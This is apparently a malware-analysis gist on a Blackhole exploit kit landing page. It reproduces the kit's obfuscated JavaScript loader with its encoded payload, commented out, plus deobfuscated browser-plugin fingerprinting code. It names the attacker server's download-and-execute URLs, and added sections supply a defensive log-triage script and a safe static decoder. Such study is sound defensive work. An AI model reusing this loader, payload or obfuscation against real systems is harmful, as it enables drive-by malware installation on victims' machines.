Browser malware found in the wild, 02/28/2012, deobf version
/* Hello from upgradeyour.com (coming soon),
I've done some security work in the past and figured this would be a fun and quick puzzle. I found the same hash as Scott on http://50.116.17.63/stats/counter.php?id=547b373f97233059 and googling it led to his post :)
It tries to identify browser/OS version, and possibly run a wmp exp
It also tries to visit http://50.116.17.63/stats/w.php?f=b6863&e=4 and http://50.116.17.63/stats/w.php?f=b6863&e=1 and download+exec, two different exes
It tries a pdf exploit ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188 and also http://50.116.17.63/stats/content/ap2.php?f=b6863 and http://50.116.17.63/content/ap1.php?f=b6863 ), and hcp exploit as well ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 ), and some pdf exploit
This is all part of the blackhole exploit kit, and this botnet is seemingly huge!
Scott's post is below, and after it is the deobfuscated eval and shellcode it tries to run
*/
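Added example, not part of the original gist: a proxy-log triage script that matches the request shapes quoted in the comment above and separates clients that only loaded kit pages from clients whose payload download succeeded or was blocked. The log line layout, the hosts `compromised.example` and `intranet.example`, the `page=` value and the stage and verdict labels are assumptions made for the example; the sample lines are constructed.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Request shapes taken from the URLs quoted in the gist comment.
# Each entry: (stage label, path pattern, query parameters that must be present).
# The stage labels are names chosen for this example.
STAGES = [
    ("landing", re.compile(r"/main\.php$"), {"page"}),
    ("counter", re.compile(r"/stats/counter\.php$"), {"id"}),
    ("pdf_exploit", re.compile(r"/content/ap[12]\.php$"), {"f"}),
    ("payload", re.compile(r"/stats/w\.php$"), {"f", "e"}),
]

# Verdicts ordered by severity; a client keeps the worst one seen.
RANK = {"exposed": 0, "payload_blocked": 1, "payload_fetched": 2}

# Constructed sample log: "<ISO time> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2012-02-28T10:00:01 10.0.0.5 GET http://compromised.example/main.php?page=0123456789abcdef 200
2012-02-28T10:00:02 10.0.0.5 GET http://50.116.17.63/stats/counter.php?id=547b373f97233059 200
2012-02-28T10:00:04 10.0.0.5 GET http://50.116.17.63/stats/content/ap2.php?f=b6863 200
2012-02-28T10:00:09 10.0.0.5 GET http://50.116.17.63/stats/w.php?f=b6863&e=4 200
2012-02-28T10:01:00 10.0.0.7 GET http://compromised.example/main.php?page=0123456789abcdef 200
2012-02-28T10:01:03 10.0.0.7 GET http://50.116.17.63/stats/w.php?f=b6863&e=1 403
2012-02-28T10:02:00 10.0.0.9 GET http://intranet.example/main.php 200
2012-02-28T10:02:05 10.0.0.9 GET http://intranet.example/stats/w.php?f=report 200
"""


def classify(url):
    """Return the stage label for a URL, or None if it does not match.

    Both the path and the full set of required query parameters must match,
    which keeps an unrelated /main.php or /stats/w.php from being flagged.
    """
    parts = urlsplit(url)
    params = set(parse_qs(parts.query, keep_blank_values=True))
    for name, path_re, required in STAGES:
        if path_re.search(parts.path) and required <= params:
            return name
    return None


def parse_line(line):
    """Split one log line of the assumed layout into typed fields."""
    ts, client, _method, url, status = line.split()[:5]
    return datetime.fromisoformat(ts), client, url, int(status)


def correlate(log_text):
    """Group matching requests per client and assign a triage verdict.

    exposed          kit pages were requested, no payload request seen
    payload_blocked  the payload URL was requested but did not return 200
    payload_fetched  the payload URL returned 200 (treat host as compromised)
    """
    clients = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, client, url, status = parse_line(line)
        stage = classify(url)
        if stage is None:
            continue
        rec = clients.setdefault(
            client, {"first_seen": when, "stages": [], "verdict": "exposed"}
        )
        rec["stages"].append(stage)
        if stage == "payload":
            outcome = "payload_fetched" if status == 200 else "payload_blocked"
            if RANK[outcome] > RANK[rec["verdict"]]:
                rec["verdict"] = outcome
    return clients


if __name__ == "__main__":
    for client, rec in sorted(correlate(SAMPLE_LOG).items()):
        print(client, rec["verdict"], "->".join(rec["stages"]))
```
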
/*
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
/*<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
if(aaa==aa)
a="[encoded payload string omitted]
#to#ti#ei#yy#ut#yq#ye#yi#cw#yt#w#tt#cq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yi#cr#cr#yw#wq#u#qy#cw#yi#wq#y#qy#cw#yq#r#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#wq#e#y#r#i#qy#e#u#cq#cq#ie#to#yy#ue#to#iq#ty#qo#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#y#tq#cq#iw#iw#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#u#tq#cq#qu#tu#qo#t#qo#tp#ue#p#cw#ro#tp#ti#tp#r#tq#q#cq#t#yq#qu#ur#uw#uo#iq#yp#qo#cw#ty#iw#iw#ti#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#ti#r#ye#yi#ue#to#uw#ur#ep#rw#et#er#cw#ci#yo#ty#yr#to#tu#ur#ci#w#ro#ci#tu#yy#tt#ue#ue#ye#ti#ci#w#yq#r#tu#yy#tt#ue#ue#eq#wy#tq#w#ro#ci#ue#uw#tu#ci#w#ci#ci#tq#w#ci#ci#w#yq#cq#cq#cq#r#wo#to#ur#rr#to#uw#ue#ye#yo#yi#ue#cw#cq#qu#yp#yo#uw#cw#yu#qo#y#qu#yu#qi#qq#qu#yu#q#q#cq#iq#ye#yp#cw#tu#r#ur#to#ue#ur#cw#yp#cq#cr#cr#cw#co#yw#iw#iw#rp#to#yq#wu#ui#up#r#cy#u#wp#yw#cq#cq#iq#yw#qo#rp#to#yq#wu#ui#up#r#cy#u#ie#ie#ie#tu#tt#ur#tu#yw#cw#ye#cq#iq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yw#wq#u#qy#cw#ty#wq#y#qy#e#u#cq#ie#ye#yp#cw#co#yq#r#uy#to#uw#ue#ye#yo#yi#cq#iq#yq#r#uy#to#uw#ue#ye#yo#yi#qo#ti#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#yw#cq#ie#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#qo#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#ie#ie#w#ip#ip#qy#y#ie#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#ye#yi#ye#ur#rq#tu#uw#ye#up#ur#cw#cq#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#r#ci#cq#qu#up#ti#yp#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#we#ti#yo#ty#to#rp#to#tt#ti#to#uw#ci#cq#qu#yp#yy#tt#ue#yw#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ce#wi#yy#tt#ue#yw#ce#cq#qu#ie#tu#tt#ur#tu#yw#cw#to#cq#iq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#up#ti#yp#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#up#ti#yp#uy#to#uw#qo#up#ti#yp#uy#to#uw#r#ue#up#yy#ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#up#ti#yp#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#yp#yy#tt#ue#yw#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#yp#yy#tt#ue#yw#uy#to#uw#r#ue#up#yy#
ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#qu#to#ui#to#tu#qe#qo#u#qu#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#y#cw#cq#iq#ue#up#yy#i#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#i#cw#cq#iq#ue#up#yy#o#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#o#cw#cq#iq#ue#up#yy#qp#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qp#cw#cq#iq#ue#up#yy#qq#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wt#ey#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#ce#tu#yo#yi#ur#to#yi#ur#t#ue#tu#yo#uw#to#r#ue#uu#yp#ce#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wr#yy#yo#tu#yt#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#cqp#p#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#wt#yo#ut#yi#ur#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#o#y#y#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wi#ye#yy#yy#wr#uo#ur#to#ue#cw#cq#iq#uy#tt#uw#cqp#tt#qo#ce#ct#ut#ce#q#ce#y#tu#y#tu#ce#qu#uw#to#ur#ut#uw#yi#cqp#tt#q#tt#qu#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#rq#yw#to#yy#yy#wt#yo#ti#to#cw#cq#iq#ye#yp#cw#u#cq#iq#uw#to#ur#ut#uw#yi#cqp#ci#ct#ut#qp#u#qp#u#ct#ut#qp#u#qp#u#ct#ut#qr#o#qw#qw#ct#ut#yp#tu#to#qp#ct#ut#to#ty#yp#tu#ct#ut#qq#qr#u#y#ct#ut#tu#qt#o#u#ct#ut#qr#u#qw#qw#ct#ut#qq#qp#to#qt#ct#ut#qr#y#yp#to#ct#ut#i#qr#o#y#ct#ut#to#i#qp#y#ct#ut#to#ty#yp#tt#ct#ut#to#qr#y#qq#ct#ut#yp#yp#to#ty#ct#ut#yp#yp#yp#yp#ct#ut#tu#tu#tt#ti#ct#ut#u#tu#qq#ti#ct#ut#qe#qe#tu#u#ct#ut#to#qr#u#ty#ct#ut#tt#o#qp#tu#ct#ut#u#qr#qw#qr#ct#ut#qw#qr#tt#o#ct#ut#tt#o#i#qp#ct#ut#o#qp#qq#qr#ct#ut#tt#o#qe#to#ct#ut#i#y#qq#to#ct#ut#yp#o#u#ty#ct#ut#tt#o#qp#to#ct#ut#u#qp#qe#qw#ct#ut#qq#tu#i#ty#ct#ut#y#qp#u#ty#ct#ut#tu#qw#tt#qt#ct#ut#o#qr#o#ti#ct#ut#ti#qe#ti#qe#ct#ut#tt#o#qt#y#ct#ut#u#qr#qw#qr#ct#ut#qw#to#to#ty#ct#ut#i#to#u#u#ct#ut#ti#o#qq#ti#ct#ut#u#tu#tt#yp#ct#ut#tt#ti#y#tu#ct#ut#qq#ti#tu#tu#ct#ut#tu#u#qe#qt#ct#ut#qw#qp#tu#o#ct#ut#qe#to#qe#qt#ct#ut#qq#ti#tt#o#ct#ut#tt#o#u#qp#ct#ut#u#ti#qq#tu#ct#ut#i#ty#qq#y#ct#ut#qe#to#ti#ti#
ct#ut#qq#to#tt#o#ct#ut#i#ty#y#qr#ct#ut#u#ty#ti#ti#ct#ut#qw#u#to#u#ct#ut#ti#qp#qw#qt#ct#ut#i#ty#qr#qq#ct#ut#u#ty#to#ti#ct#ut#i#qe#yp#o#ct#ut#o#qr#qt#qw#ct#ut#ti#tt#u#y#ct#ut#i#y#qq#tu#ct#ut#to#o#to#qt#ct#ut#i#ty#i#qq#ct#ut#qw#qr#yp#i#ct#ut#ti#qt#tu#o#ct#ut#o#qe#u#o#ct#ut#tu#to#qq#ti#ct#ut#tt#o#qe#qw#ct#ut#y#tu#qe#qw#ct#ut#yp#qq#i#ty#ct#ut#tt#o#qp#to#ct#ut#qw#o#i#qp#ct#ut#qw#to#tt#qq#ct#ut#ti#qe#tu#qp#ct#ut#y#tu#qe#tu#ct#ut#tt#o#i#qp#ct#ut#i#ty#yp#y#ct#ut#tt#o#yp#qq#ct#ut#tt#o#i#tu#ct#ut#to#ti#i#ty#ct#ut#qe#qw#qr#o#ct#ut#to#ty#qe#u#ct#ut#qe#ty#tu#o#ct#ut#tt#o#qr#qq#ct#ut#y#qr#qp#y#ct#ut#qq#qq#tt#qr#ct#ut#u#ty#i#qp#ct#ut#i#ty#qq#tu#ct#ut#tu#o#ty#to#ct#ut#tt#o#ti#ty#ct#ut#i#y#qp#y#ct#ut#ti#yp#tt#o#ct#ut#i#ti#qp#i#ct#ut#tu#y#qe#u#ct#ut#ti#qe#ty#y#ct#ut#ti#qe#ti#qe#ct#ut#ti#u#tu#tt#ct#ut#i#qr#tu#y#ct#ut#i#qr#i#qr#ct#ut#qe#y#i#qr#ct#ut#qp#i#qe#qr#ct#ut#qp#y#qw#qr#ct#ut#i#qr#ti#qe#ct#ut#i#qr#i#qr#ct#ut#tt#ty#qe#qr#ct#ut#o#u#to#qr#ct#ut#qe#ti#qe#qr#ct#ut#tu#qp#tt#o#ct#ut#qe#qw#tt#o#ct#ut#tt#ty#o#qr#ct#ut#i#ti#to#ty#ct#ut#tu#ty#ti#qe#ct#ut#qp#qe#qp#y#ct#ut#i#qr#qp#qw#ct#ut#qp#y#i#qr#ct#ut#qq#tt#qq#ti#ct#ut#qp#qq#qp#qp#ct#ut#ti#qe#qe#tu#ct#ut#tt#ty#o#to#ct#ut#i#y#to#tu#ct#ut#tu#y#tt#o#ct#ut#qp#qt#tu#y#ct#ut#ti#qe#ti#qe#ct#ut#tu#o#ti#qe#ct#ut#tu#o#i#tt#ct#ut#tt#qt#qq#tt#ct#ut#i#tu#tu#qp#ct#ut#i#qr#i#qt#ct#ut#tt#qq#i#qr#ct#ut#y#tu#qe#qp#ct#ut#to#yp#i#qp#ct#ut#y#tu#i#tu#ct#ut#qp#ti#qq#tt#ct#ut#qq#ty#qp#yp#ct#ut#qw#tu#to#yp#ct#ut#i#tu#y#tu#ct#ut#qq#tt#qq#to#ct#ut#u#tt#u#ty#ct#ut#qw#tu#to#yp#ct#ut#i#y#y#tu#ct#ut#y#qq#y#qr#ct#ut#y#qr#qq#ty#ct#ut#qp#y#qe#ty#ct#ut#i#qr#ti#y#ct#ut#i#qr#i#qr#ct#ut#qe#to#ti#qe#ct#ut#tt#o#i#qp#ct#ut#u#ty#tu#y#ct#ut#qe#qt#to#u#ct#ut#qw#tu#to#yp#ct#ut#i#qr#o#qq#ct#ut#qq#qr#qq#yp#ct#ut#qq#tu#qp#tt#ct#ut#qw#tu#to#yp#ct#ut#i#ti#o#qq#ct#ut#qp#tu#y#qw#ct#ut#qp#qp#qp#qp#ct#ut#qw#tu#to#to#ct#ut#i#u#o#qq#ct#ut#qe#u#i#qr#ct#ut#to#qt#tt#i#ct#ut#u#qr#i#tu#ct#ut#qw#tu#tt#y#ct#ut#i#tu#o#qq#ct#ut#qe#qt#qw#qt#ct#ut#i#qr#qp#i#ct#ut#i#qr#qp#i#ct#ut#qe#yp#qe#ty#ct#ut#i#qr#qp
#i#ct#ut#qe#to#ti#qe#ct#ut#tt#ti#o#tu#ct#ut#qq#ti#to#qr#ct#ut#qp#i#o#to#ct#ut#qe#ty#i#qr#ct#ut#qe#to#ti#qe#ct#ut#qp#i#i#tu#ct#ut#tt#ty#i#qr#ct#ut#i#qp#tu#o#ct#ut#ti#qe#qe#ty#ct#ut#i#tu#qe#to#ct#ut#to#ty#tt#ty#ct#ut#tu#o#i#qp#ct#ut#tu#o#i#tt#ct#ut#qw#yp#o#ty#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qw#yp#ti#i#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qp#i#to#tu#ct#ut#qp#i#i#qr#ct#ut#ti#qe#ti#qw#ct#ut#i#y#qe#to#ct#ut#ty#qp#tu#y#ct#ut#ti#qe#ti#qw#ct#ut#tt#qw#ti#qe#ct#ut#i#qw#qw#qw#ct#ut#ty#y#tu#qp#ct#ut#tt#i#ti#qw#ct#ut#tt#u#i#qw#ct#ut#i#qt#qp#qe#ct#ut#u#ty#qt#qq#ct#ut#tt#i#to#i#ct#ut#o#o#qe#o#ct#ut#qw#to#to#to#ct#ut#u#to#qq#u#ct#ut#y#qe#o#i#ct#ut#qp#y#qq#qr#ct#ut#qq#tu#qq#tu#ct#ut#u#i#qq#qr#ct#ut#y#qe#y#qe#ct#ut#qq#yp#qq#tu#ct#ut#qq#ty#qp#u#ct#ut#qp#ti#qq#tu#ct#ut#qq#tu#qp#tu#ct#ut#qq#tt#qp#qt#ct#ut#qq#ty#qq#tu#ct#ut#qp#qw#y#qw#ct#ut#qq#tu#qp#ti#ct#ut#qq#yp#y#qe#ct#ut#qq#qr#y#qw#ct#ut#qq#qr#qp#y#ct#ut#qp#to#u#qe#ct#ut#u#qt#u#qq#ct#ut#u#ty#qp#tt#ct#ut#u#yp#u#ty#ct#ut#qp#ti#y#to#ct#ut#u#qt#u#qq#ct#ut#i#qr#i#qr#ci#qu#ie#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qq#cw#cq#iq#uy#tt#uw#cqp#uy#to#uw#u#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#y#tq#qu#uy#tt#uw#cqp#uy#to#uw#i#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#u#tq#qu#uy#tt#uw#cqp#uy#to#uw#o#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#i#tq#qu#ye#yp#cqp#cw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#y#cr#cr#uy#to#uw#o#wp#qp#y#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#wp#y#cq#cr#cr#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#i#cr#cr#uy#to#uw#o#qi#u#qq#qt#cq#iw#iw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iq#uy#tt#uw#cqp#yp#yi#tt#yu#to#qo#ci#tu#yo#yi#ur#to#yi#ur#t#yp#ye#to#yy#ti#ci#qu#uy#tt#uw#cqp#wi#yy#tt#ue#yw#te#yo#ty#yr#qo#ci#qi#yo#ty#yr#to#tu#ur#cqp#tu#yy#tt#ue#ue#ye#ti#qo#ce#tu#yy#ue#ye#ti#qy#ti#i#qe#tu#ti#ty#qw#to#e#tt#to#qw#ti#e#u#u#tu#yp#e#qt#qw#ty#qr#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ce#cqp#uu#ye#ti#ur#yw#qo#u#y#cqp#yw#to#ye#yq#yw#ur#qo#u#y#cqp#ye#ti#qo#ce#ue#uu
#yp#te#ye#ti#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#yu#yo#uy#ye#to#ce#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#t#wp#ci#qu#tt#yy#qo#ci#tt#yy#uu#tt#uo#ue#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#tp#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#tp#ci#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#tt#yy#q#ci#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#ei#yy#tt#uo#ce#cqp#uy#tt#yy#ut#to#qo#ce#y#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#to#yu#ty#to#ti#cqp#ue#uw#tu#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#ye#ti#qo#ce#ue#uu#yp#te#ye#ti#ce#cqp#yi#tt#yu#to#qo#ce#ue#uu#yp#te#ye#ti#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#qo#ce#ci#q#tt#yy#q#ci#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#ur#uo#up#to#qo#ce#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#ui#e#ue#yw#yo#tu#yt#uu#tt#uy#to#e#yp#yy#tt#ue#yw#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#uu#ye#ti#ur#yw#qo#ce#u#y#ce#cqp#yw#to#ye#yq#yw#ur#qo#ce#u#y#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#to#yu#ty#to#ti#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#yo#ty#yr#to#tu#ur#wp#ci#qu#uy#tt#uw#cqp#yo#rq#up#tt#yi#qo#ti#yo#tu#ut#yu#to#yi#ur#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ue#up#tt#yi#ci#cq#qu#ti#yo#tu#ut#yu#to#yi#ur#r#ty#yo#ti#uo#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#yo#rq#up#tt#yi#cq#qu#yo#rq#up#tt#yi#r#ye#yi#yi#to#uw#ep#rw#et#er#qo#wi#yy#tt#ue#yw#te#yo#ty#yr#qu#ie#ue#to#ur#rw#ye#yu#to#yo#ut#ur#cw#to#yi#ti#te#uw#to#ti#ye#uw#to#tu#ur#w#qr#y#y#y#cq#qu#ie#ue#up#yy#y#cw#cq#qu";
try{new btoa(12);}catch(qqq){r+="eplace";}
a=a[r](/q/g,"1");
a=a[r](/w/g,"2");
a=a[r](/e/g,"3");
a=a[r](/r/g,"4");
a=a[r](/t/g,"5");
a=a[r](/y/g,"6");
a=a[r](/u/g,"7");
a=a[r](/i/g,"8");
a=a[r](/o/g,"9");
a=a[r](/p/g,"0");
a=a[r](/c/g,"-");
}
a=a.split("#");
md='a';
c=[];
i=0;
p=parseInt;
try{new window(123).typ;}catch(qqq){qq=String;}
try{new btoa(12);}catch(qqq){fr="ode";}
try{new btoa(12);}catch(qqq){qq2=e("qq.fromCharCode");}
if(aaa==aa){
while(15062>i){
vv=a[i];
r2=cc=qq2(40+2+1*vv);
r=c;
if(fr)c=r+r2;
i=i+1;
}
w=e;
w(c);
}
*/
</script></body></html> */
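/* Added example, not part of the original gist or of the kit's own code: a static decoder for the token scheme used by the loader above. It applies the same letter-to-digit table and the 40+2 offset, but only returns a string and never calls eval. The function names and the rejected-token report are choices made for this example. */

```javascript
'use strict';

// Substitution applied by the loader's replace() chain (q->1 ... p->0, c->'-').
const LETTER_TO_DIGIT = new Map([
  ['q', '1'], ['w', '2'], ['e', '3'], ['r', '4'], ['t', '5'], ['y', '6'],
  ['u', '7'], ['i', '8'], ['o', '9'], ['p', '0'], ['c', '-'],
]);

// The loader builds each character as fromCharCode(40 + 2 + 1 * token).
const CHAR_OFFSET = 42;

// Translate one token such as "ti" or "cqp" into a character code.
// Returns null when the token cannot have come from this encoder.
function tokenToCharCode(token) {
  let digits = '';
  for (const ch of token) {
    const mapped = LETTER_TO_DIGIT.get(ch);
    if (mapped === undefined) return null;
    digits += mapped;
  }
  // Only an optional leading minus followed by digits is a valid number here.
  if (!/^-?\d+$/.test(digits)) return null;
  const code = CHAR_OFFSET + parseInt(digits, 10);
  return code >= 0 && code <= 0xffff ? code : null;
}

// Decode a whole blob to text. Nothing is evaluated: the result is a string
// for reading, diffing or scanning. Whitespace is removed first because a
// pasted copy of the blob may be line-wrapped, even in the middle of a token.
function decodeBlob(blob) {
  const chars = [];
  const rejected = [];
  blob.replace(/\s+/g, '').split('#').forEach((token, index) => {
    const code = tokenToCharCode(token);
    if (code === null) {
      rejected.push({ index, token }); // keep position for manual review
    } else {
      chars.push(String.fromCharCode(code));
    }
  });
  return { text: chars.join(''), rejected };
}

// The first 24 tokens of the blob shown on this page.
const SAMPLE = 'ti#yo#tu#ut#yu#to#yi#ur#r#uu#uw#ye#ur#to#cw#ce#qi#tu#to#yi#ur#to#uw#wp';

const demo = decodeBlob(SAMPLE);
console.log(JSON.stringify(demo.text), 'rejected tokens:', demo.rejected.length);
```
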
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------- Deobfuscated Code Below ---------------- */
/* ------------------------------------------------------ */
document.write('<center><h1>Please wait while loading...</h1><img src="loading_animation.gif" alt="loading content animation"><br><br><hr><p>We processing your request, please be patient for a while.</p></center><hr>');
function end_redirect() {
window.location.href = '/welcome.php';
}
var pdfver = [0, 0, 0, 0],
flashver = [0, 0, 0, 0];
try {
var PluginDetect = {
version: "0.7.6",
name: "PluginDetect",
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return(/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
isStrNum: function (b) {
return(typeof b == "string" && (/\d/).test(b))
},
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if(e.isStrNum(h) && e.isStrNum(f)) {
if(e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for(a = 0; a < Math.min(c.length, b.length); a++) {
if(g(c[a], 10) > g(b[a], 10)) {
return 1
}
if(g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
formatNum: function (b, c) {
var d = this,
a, e;
if(!d.isStrNum(b)) {
return null
}
if(!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for(a = 0; a < 4; a++) {
if(/^(0+)(.+)$/.test(e[a])) {
e[a] = RegExp.$2
}
if(a > c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function (a) {
return function (d) {
if(!a.isIE && d) {
var c, b, e, f = a.isString(d) ? [d] : d;
if(!f || !f.length) {
return null
}
for(e = 0; e < f.length; e++) {
if(/[^\s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.enabledPlugin) && (b.name || b.description)) {
return c
}
}
}
return null
}
},
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for(f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if(!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
getMimeEnabledPlugin: function (k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for(d = 0; d < j.length; d++) {
if((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if(b.test(l) || b.test(a)) {
if(!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
getPluginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if(h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if(!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for(a = 0; a < d.length; a++) {
if(c > -1 && a > c && d[a] != "0") {
return b
}
if(g[a] != d[a]) {
if(c == -1) {
c = a
}
if(d[a] != "0") {
return b
}
}
}
return e
},
AXO: window.ActiveXObject,
getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
